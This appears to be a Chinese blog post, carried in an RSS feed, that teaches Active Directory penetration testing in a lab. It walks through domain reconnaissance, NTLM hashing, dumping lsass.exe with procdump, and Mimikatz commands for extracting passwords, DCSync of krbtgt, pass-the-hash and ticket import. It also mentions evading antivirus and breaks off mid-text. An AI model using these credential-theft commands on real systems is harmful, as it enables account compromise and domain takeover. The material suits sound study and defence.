<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Kerberos on MentalityXt</title><link>http://xtpol.com/zh/tags/kerberos/</link><description>Recent content in Kerberos on MentalityXt</description><generator>Hugo -- gohugo.io</generator><language>zh-cn</language><lastBuildDate>Tue, 19 Nov 2024 08:58:00 +0800</lastBuildDate><atom:link href="http://xtpol.com/zh/tags/kerberos/index.xml" rel="self" type="application/rss+xml"/><item><title>域渗透：PTT、PTH 与 PTC</title><link>http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/</link><pubDate>Tue, 19 Nov 2024 08:58:00 +0800</pubDate><guid>http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/</guid><description>&lt;h2 id="域渗透学习"&gt;&lt;a href="#%e5%9f%9f%e6%b8%97%e9%80%8f%e5%ad%a6%e4%b9%a0" class="header-anchor"&gt;&lt;/a&gt;域渗透学习&#10;&lt;/h2&gt;&lt;p&gt;[TOC]&lt;/p&gt;&#10;&lt;p&gt;在渗透测试过程中，我们经常会遇到以下场景：某处于域中的服务器通过路由做端口映射，对外提供web服务，我们通过web脚本漏洞获得了该主机的system权限，如果甲方有进一步的内网渗透测试需求，以证明企业所面临的巨大风险，这个时候就需要做内网的域渗透。通常，我们是以获得域控制器的权限为目标，因为一旦域控制器沦陷，整个内网就尽在掌握中了。&lt;/p&gt;&#10;&lt;h3 id="一环境配置"&gt;&lt;a href="#%e4%b8%80%e7%8e%af%e5%a2%83%e9%85%8d%e7%bd%ae" class="header-anchor"&gt;&lt;/a&gt;一、环境配置&#10;&lt;/h3&gt;&lt;p&gt;在开始之前，需要先配置好⼀个域环境。因为用于教学测试，所以只需一台域控和一台加入域内的主机即可。这里我使用的是 windows server 2012 与 windows 7。通过攻击拿下 windows 7 或者直接操控 windows 7，来模拟被攻陷的主机，从而进行域方面是渗透学习。&lt;/p&gt;&#10;&lt;p&gt;windows server 2012 存在Administrator用户(域控超级管理员用户)、Windows7的dada用户(加入管理员组的用户)、Windows7的xiao用户(普通域用户)&lt;/p&gt;&#10;&lt;h3 id="二域内信息收集"&gt;&lt;a href="#%e4%ba%8c%e5%9f%9f%e5%86%85%e4%bf%a1%e6%81%af%e6%94%b6%e9%9b%86" class="header-anchor"&gt;&lt;/a&gt;二、域内信息收集&#10;&lt;/h3&gt;&lt;p&gt;所有渗透测试的第⼀步，都是信息收集，域也不例外。&lt;/p&gt;&#10;&lt;h4 id="确定环境"&gt;&lt;a href="#%e7%a1%ae%e5%ae%9a%e7%8e%af%e5%a2%83" class="header-anchor"&gt;&lt;/a&gt;①确定环境&#10;&lt;/h4&gt;&lt;p&gt;在域内需要先确定被攻击主机的当前内网环境，如拓扑等信息，可以使用以下命令来快速定位。&lt;/p&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;span class="lnt"&gt;4&#10;&lt;/span&gt;&lt;span class="lnt"&gt;5&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;route print # 查看路由信息&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;arp -a # 查看域中所有的设备&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ipconfig /all # 判断当前是否在域环境中，看dns后缀和dns服务器&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;ping &amp;#34;域名&amp;#34;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;net time /domain #查看系统时间（判断主域）&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;ul&gt;&#10;&lt;li&gt;在渗透时，拿到的数据记得保存，不要看一眼就没了，也尽量不要重复查看，所有的动作都要求干净利索。&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;h4 id="域内信息"&gt;&lt;a href="#%e5%9f%9f%e5%86%85%e4%bf%a1%e6%81%af" class="header-anchor"&gt;&lt;/a&gt;②域内信息&#10;&lt;/h4&gt;&lt;p&gt;除了了解内网环境外，还可以通过命令来直接查看域的相关消息。&lt;/p&gt;&#10;&lt;h5 id="1net-view"&gt;&lt;a href="#1net-view" class="header-anchor"&gt;&lt;/a&gt;1、net view&#10;&lt;/h5&gt;&lt;p&gt;查看本地工作组/域环境中的设备&lt;/p&gt;&#10;&lt;p&gt;查看域内在线主机，此时可以看⻅域内的两台机器，⼀台被攻陷的XZM-PC和域控AD。&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0001.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;p&gt;如果报错6118 =&amp;gt;&lt;/p&gt;&#10;&lt;p&gt;1、关闭防火墙；2、开启服务（Computer Browser、Server、Workstation）；3、重新打开CMD即可&lt;/p&gt;&#10;&lt;h5 id="2net-view-domain"&gt;&lt;a href="#2net-view-domain" class="header-anchor"&gt;&lt;/a&gt;2、net view /domain&#10;&lt;/h5&gt;&lt;p&gt;查看当前有几个域。可以看见此时有一个MAO域。&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0002.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;h5 id="3net-user-domain"&gt;&lt;a href="#3net-user-domain" class="header-anchor"&gt;&lt;/a&gt;3、net user /domain&#10;&lt;/h5&gt;&lt;p&gt;查看域内⽤户，可以看⻅除了常⻅的管理员和来宾，域内还有⼀个krbtgt⽤户，这个⽤户⾮常重要，稍后会讲到。&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0003.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;h5 id="4net-group-domain"&gt;&lt;a href="#4net-group-domain" class="header-anchor"&gt;&lt;/a&gt;4、net group /domain&#10;&lt;/h5&gt;&lt;p&gt;查看域的组别信息&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0004.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;p&gt;这⾥可以看⻅组较多，这⾥列出⼏个关键组了解⼀下。&lt;/p&gt;&#10;&lt;p&gt;*Domain Admins 管理员组&lt;/p&gt;&#10;&lt;p&gt;*Domain Computers 主机名&lt;/p&gt;&#10;&lt;p&gt;*Domain Controllers 域控组&lt;/p&gt;&#10;&lt;p&gt;*Enterprise Admins 企业级管理员&lt;/p&gt;&#10;&lt;p&gt;可以通过 &lt;code&gt;net group 组名 /domain&lt;/code&gt; 来查看组内⽤户。&lt;/p&gt;&#10;&lt;h5 id="5whoami-user"&gt;&lt;a href="#5whoami-user" class="header-anchor"&gt;&lt;/a&gt;5、whoami /user&#10;&lt;/h5&gt;&lt;p&gt;确定自身权限&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0005.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;ul&gt;&#10;&lt;li&gt;500：administrator&lt;/li&gt;&#10;&lt;li&gt;501：guest&lt;/li&gt;&#10;&lt;li&gt;1000+：普通用户&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;h5 id="6net-group-domain-controllers-domain"&gt;&lt;a href="#6net-group-domain-controllers-domain" class="header-anchor"&gt;&lt;/a&gt;6、net group &amp;ldquo;domain controllers&amp;rdquo; /domain&#10;&lt;/h5&gt;&lt;p&gt;查看域控管理员组的成员(域内高权限组)&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0006.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;ul&gt;&#10;&lt;li&gt;Domain Admins 域控管理员组(高权限)&lt;/li&gt;&#10;&lt;li&gt;Domain Computers 加入域内的主机成员&lt;/li&gt;&#10;&lt;li&gt;Domain Controllers 域控(高权限)&lt;/li&gt;&#10;&lt;li&gt;Domain Users 域内普通用户&lt;/li&gt;&#10;&lt;li&gt;Enterprise Admins 企业管理员(高权限)&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;h5 id="8systeminfo--findstr-kb"&gt;&lt;a href="#8systeminfo--findstr-kb" class="header-anchor"&gt;&lt;/a&gt;8、systeminfo | findstr &amp;ldquo;KB&amp;rdquo;&#10;&lt;/h5&gt;&lt;p&gt;查看补丁信息&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0007.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;h5 id="7定位域控"&gt;&lt;a href="#7%e5%ae%9a%e4%bd%8d%e5%9f%9f%e6%8e%a7" class="header-anchor"&gt;&lt;/a&gt;7、定位域控&#10;&lt;/h5&gt;&lt;p&gt;域控作为域的最⾼权限，⾃然是⾸要的攻击⽬标，可以通过刚才的⼀些已知的命令，来找到域控。&lt;/p&gt;&#10;&lt;p&gt;通过 &lt;code&gt;net user /domain&lt;/code&gt; 来查看域内的账户；通过 &lt;code&gt;net group &amp;quot;domain controllers&amp;quot; /domain&lt;/code&gt; 来查看域控。自身权限可以使⽤ &lt;code&gt;whoami /user&lt;/code&gt; 命令快速查看。&lt;/p&gt;&#10;&lt;h3 id="三本地认证"&gt;&lt;a href="#%e4%b8%89%e6%9c%ac%e5%9c%b0%e8%ae%a4%e8%af%81" class="header-anchor"&gt;&lt;/a&gt;三、本地认证&#10;&lt;/h3&gt;&lt;h4 id="windows本地认证"&gt;&lt;a href="#windows%e6%9c%ac%e5%9c%b0%e8%ae%a4%e8%af%81" class="header-anchor"&gt;&lt;/a&gt;①Windows本地认证&#10;&lt;/h4&gt;&lt;p&gt;在开始攻击之前，需要先了解⼀下 windows 的认证机制。&lt;/p&gt;&#10;&lt;p&gt;通过操作系统的学习，已知 &lt;code&gt;C:\Windows\System32\config\SAM&lt;/code&gt; 是储存主机账号密码的数据库⽂件。&lt;/p&gt;&#10;&lt;p&gt;windows 登⼊的过程其实很简单，启动winlogin.exe，当⽤户输⼊账号密码后，账号密码将会发送到lsass.exe，lsass.exe将会把⽤户输⼊的明⽂，转换为NTLM hash与，SAM⽂件存储的数据做⽐较，⽐较成功即登⼊成功。&lt;/p&gt;&#10;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0008.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;p&gt;Windows Logon: 是wWindows操作系统的用户登录程序，负责管理用户的登录和登出过程。它提供了用户输入账号和密码的界面，也称为登录页面或登录屏幕。&lt;/p&gt;&#10;&lt;p&gt;lsass: 是微软windows系统的安全机制，是Windows操作系统中的一个关键进程，负责处理本地安全和登录策略。它在Windows系统启动时自动启动，并一直运行在后台。&lt;/p&gt;&#10;&lt;h4 id="ntlm-hash"&gt;&lt;a href="#ntlm-hash" class="header-anchor"&gt;&lt;/a&gt;②NTLM hash&#10;&lt;/h4&gt;&lt;p&gt;当然，windows本身是不会存储明⽂密码的，在SAM⽂件中所存储的是密码的散列值，⽽在登⼊的时候，也是先将⽤户输⼊转换为散列值，才进⾏对⽐的。&lt;/p&gt;&#10;&lt;p&gt;Hash一般存储在两个地方：&lt;/p&gt;&#10;&lt;ul&gt;&#10;&lt;li&gt;1、SAM文件，存储在本机 =&amp;gt; 对应本地用户&lt;/li&gt;&#10;&lt;li&gt;2、NTDS.DIT文件，存储在域控上 =&amp;gt; 对应域用户&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;h5 id="1加密过程"&gt;&lt;a href="#1%e5%8a%a0%e5%af%86%e8%bf%87%e7%a8%8b" class="header-anchor"&gt;&lt;/a&gt;1、加密过程&#10;&lt;/h5&gt;&lt;p&gt;⽤户输⼊的明⽂密码 =&amp;gt; ⼗六进制 =&amp;gt; unicode =&amp;gt; md4 算法 =&amp;gt; NTLM hash。可以看⻅，整个加密过程还是较为简单的。&lt;/p&gt;&#10;&lt;h5 id="2存储的密码格式"&gt;&lt;a href="#2%e5%ad%98%e5%82%a8%e7%9a%84%e5%af%86%e7%a0%81%e6%a0%bc%e5%bc%8f" class="header-anchor"&gt;&lt;/a&gt;2、存储的密码格式&#10;&lt;/h5&gt;&lt;p&gt;例：administrator:500:LM hash:NTLM hash&lt;/p&gt;&#10;&lt;p&gt;可以看⻅，先是⽤户名，再是该⽤户的 SID，后⾯跟着 LM hash 和 NTLM hash&lt;/p&gt;&#10;&lt;p&gt;如果LM Hash 是 AAD3B 开头，则是空密码或者未设置密码。&lt;/p&gt;&#10;&lt;p&gt;LM Hash全名为 “LAN Manager Hash”，是微软为了提⾼Windows操作系统的安全性⽽采⽤的散列加密算法，其本质是DES加密。尽管LM Hash较容易被破解，但是为了保证系统的兼容性，Windows只是将LM Hash禁⽤了(从Windows Vista和Windows Server 2008版本开始，Windows操作系统默认禁⽤LM Hash)，LM Hash明⽂密码被限制在14位以内，也就是说，如果要停⽌使⽤LM Hash，将⽤户的密码设置为14位以上就好了。&lt;/p&gt;&#10;&lt;h5 id="3lsassexe"&gt;&lt;a href="#3lsassexe" class="header-anchor"&gt;&lt;/a&gt;3、lsass.exe&#10;&lt;/h5&gt;&lt;p&gt;在内⽹渗透进⾏横向移动和权限提升时，最常⽤的⽅法是通过 &lt;code&gt;dump 进程 lsass.exe，从中获得明⽂⼝令或者hash&lt;/code&gt;。 lsass.exe（Local Security Authority SubsystemService）是⼀个系统进程，⽤于微软Windows系统的安全机制，它⽤于本地安全和登陆策略。在进程空间中，存有着机器的域、本地⽤户名和密码等重要信息。但是需要&lt;code&gt;⾸先获得⼀个⾼的权限&lt;/code&gt;才能对其进⾏访问。&lt;/p&gt;&#10;&lt;h3 id="四从-lsassexe-获取密码"&gt;&lt;a href="#%e5%9b%9b%e4%bb%8e-lsassexe-%e8%8e%b7%e5%8f%96%e5%af%86%e7%a0%81" class="header-anchor"&gt;&lt;/a&gt;四、从 lsass.exe 获取密码&#10;&lt;/h3&gt;&lt;h4 id="procdump"&gt;&lt;a href="#procdump" class="header-anchor"&gt;&lt;/a&gt;①Procdump&#10;&lt;/h4&gt;&lt;p&gt;procdump是⼀款命令⾏⼯具，主要⽤途是监视应⽤程序的CPU异常动向，并且对内存做⼀个转储。上⾯提到了密码的明⽂与密⽂都存储在lsass⾥，所以使⽤procdump即可将 lsass 的内存资源转储出来。以下是它的⼀些参数。&lt;/p&gt;&#10;&lt;h5 id="1相关参数"&gt;&lt;a href="#1%e7%9b%b8%e5%85%b3%e5%8f%82%e6%95%b0" class="header-anchor"&gt;&lt;/a&gt;1、相关参数&#10;&lt;/h5&gt;&lt;ul&gt;&#10;&lt;li&gt;-ma：写⼊“完整”转储⽂件。【包括所有内存 (映像、映射和专⽤)；包括 (进程、线程、模块、句柄、地址空间等) 的所有元数据】&lt;/li&gt;&#10;&lt;li&gt;-accepteula：使⽤该命令行选项时，表示⾃动接受Sysinternals许可协议。&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;h5 id="2简单使用"&gt;&lt;a href="#2%e7%ae%80%e5%8d%95%e4%bd%bf%e7%94%a8" class="header-anchor"&gt;&lt;/a&gt;2、简单使用&#10;&lt;/h5&gt;&lt;p&gt;使⽤⽅式⾮常简单，指定参数和要转储内存的⽂件后，再指定保存的⽂件名，即刻获得后缀名为 .dmp 的内存转储⽂件。(需要管理员权限的命令行窗口才可操作)&lt;/p&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;procdump.exe -ma -accepteula lsass.exe passwd.dmp #把内存当中的HASH导入到本地，并命名为passwd.dmp&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;pypykatz lsa minidump ./pass.dmp # 这个非常好用&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;&lt;img src="http://xtpol.com/zh/p/active-directory-ptt-pth-ptc/image-0009.zh.webp" alt="" loading="lazy" decoding="async"&gt;&#10;&lt;/p&gt;&#10;&lt;p&gt;正常我们是打不开passwd.dmp这个文件的，要是以记事本打开也都是乱码。这时，我们就要用到另一个小工具Mimikatz进行对passwd.dmp进行读取&lt;/p&gt;&#10;&lt;h4 id="mimikatz"&gt;&lt;a href="#mimikatz" class="header-anchor"&gt;&lt;/a&gt;②Mimikatz&#10;&lt;/h4&gt;&lt;p&gt;Mimikatz 是法国⼈benjamin开发的⼀款功能强⼤的轻量级调试⼯具，本意是⽤来个⼈测试，但由于其功能强⼤，能够直接读取WindowsXP-2012等操作系统的明⽂密码⽽闻名于渗透测试，可以说是渗透必备⼯具。&lt;/p&gt;&#10;&lt;h5 id="1相关参数-1"&gt;&lt;a href="#1%e7%9b%b8%e5%85%b3%e5%8f%82%e6%95%b0-1" class="header-anchor"&gt;&lt;/a&gt;1、相关参数&#10;&lt;/h5&gt;&lt;p&gt;因为 mimikatz 参数较多，这⾥只介绍常⽤的参数。&lt;/p&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;span class="lnt"&gt;4&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # :: 显示帮助指令&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # cls 清空&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # log 记录所得到的信息&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # hostname 查看主机名&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;ul&gt;&#10;&lt;li&gt;&lt;strong&gt;privilege 模块&lt;/strong&gt;&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;p&gt;(需要管理员权限的命令行窗口才可操作)&lt;/p&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # privilege::debug 提升 mimikatz 权限（通过mimkatz自带的漏洞脚本对当前设备进行攻击）&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;ul&gt;&#10;&lt;li&gt;&lt;strong&gt;sekurlsa 模块&lt;/strong&gt;&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt; 1&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 2&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 3&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 4&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 5&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 6&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 7&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 8&#10;&lt;/span&gt;&lt;span class="lnt"&gt; 9&#10;&lt;/span&gt;&lt;span class="lnt"&gt;10&#10;&lt;/span&gt;&lt;span class="lnt"&gt;11&#10;&lt;/span&gt;&lt;span class="lnt"&gt;12&#10;&lt;/span&gt;&lt;span class="lnt"&gt;13&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;1、提取当前系统中已登录用户的密码（该方法需要先提升mimikatz权限）&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # sekurlsa::logonpasswords 获取所有账户密码（比procdump的使用更简单）&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;2、抓取用户NTLM哈希(读取内存的HASH-列出 LM 和 NTML 凭证)&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # sekurlsa::msv&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;3、加载dmp文件，并导出其中的明文密码&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # sekurlsa::minidump passwd.dmp 切换环境&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # sekurlsa::logonpasswords full 列出所有可用的凭据&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;4、导出lsass.exe进程中所有的票据&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # sekurlsa::tickets /export&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;5、列出 kerberos 凭证&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # sekurlsa::kerberos 获取kerberos认证信息(账户密码等)-域内&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;6、pass-the-hash 哈希传递&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # sekurlsa::pth&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;ul&gt;&#10;&lt;li&gt;&lt;strong&gt;lsadump 模块&lt;/strong&gt;&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # lsadump::sam 查看sam文件内容获取用户名和NTLM hash&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # lsadump::secrets 获取当前用户密码&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # lsadump::dcsync /user:krbtgt 获取域控上krbtgt⽤户信息&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;ul&gt;&#10;&lt;li&gt;&lt;strong&gt;kerberos 模块&lt;/strong&gt;&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;span class="lnt"&gt;4&#10;&lt;/span&gt;&lt;span class="lnt"&gt;5&#10;&lt;/span&gt;&lt;span class="lnt"&gt;6&#10;&lt;/span&gt;&lt;span class="lnt"&gt;7&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;1、列出系统中的票据&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # kerberos::list 列出票据&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # kerberos::tgt 列出票据&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;2、清除系统中的票据&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # kerberos::purge 清除票据&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;3、导入票据到系统中&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # kerberos::ptc 票据路径&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;ul&gt;&#10;&lt;li&gt;&lt;strong&gt;process 模块&lt;/strong&gt;&lt;/li&gt;&#10;&lt;/ul&gt;&#10;&lt;div class="highlight"&gt;&lt;div class="chroma"&gt;&#10;&lt;table class="lntable"&gt;&lt;tr&gt;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code&gt;&lt;span class="lnt"&gt;1&#10;&lt;/span&gt;&lt;span class="lnt"&gt;2&#10;&lt;/span&gt;&lt;span class="lnt"&gt;3&#10;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&#10;&lt;td class="lntd"&gt;&#10;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # process::start command 启动进程&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # process::stop command 结束进程&#10;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;mimikatz # process::list 列出进程&#10;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&#10;&lt;/div&gt;&#10;&lt;/div&gt;&lt;p&gt;Mimikatz 因为效果太好导致会被杀毒警报，若是想在⽬标机器运⾏先考虑是否需要对 Mimikatz 做免杀处理。&lt;/p&gt;&#10;&lt;h5 id="2简单使用-1"&gt;&lt;a 